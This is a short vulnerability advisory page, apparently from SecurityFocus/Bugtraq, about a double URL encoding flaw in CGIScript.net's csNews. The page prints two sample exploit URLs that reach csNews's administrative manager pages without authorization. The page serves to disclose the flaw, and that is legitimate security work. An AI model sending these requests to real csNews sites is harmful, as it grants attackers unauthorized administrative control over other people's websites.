Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

CGIScript.net csNews Double URL Encoding Unauthorized Administrative Access Vulnerability

The following sample exploits have been provided by Steve Gustin <stegus1@yahoo.com>:

CSNews.cgi?database=default%2edb&command=showadv&mpage=manager
CSNews.cgi?command=manage&database=default%2edb&mpage=manager







 

Privacy Statement
Copyright 2008, SecurityFocus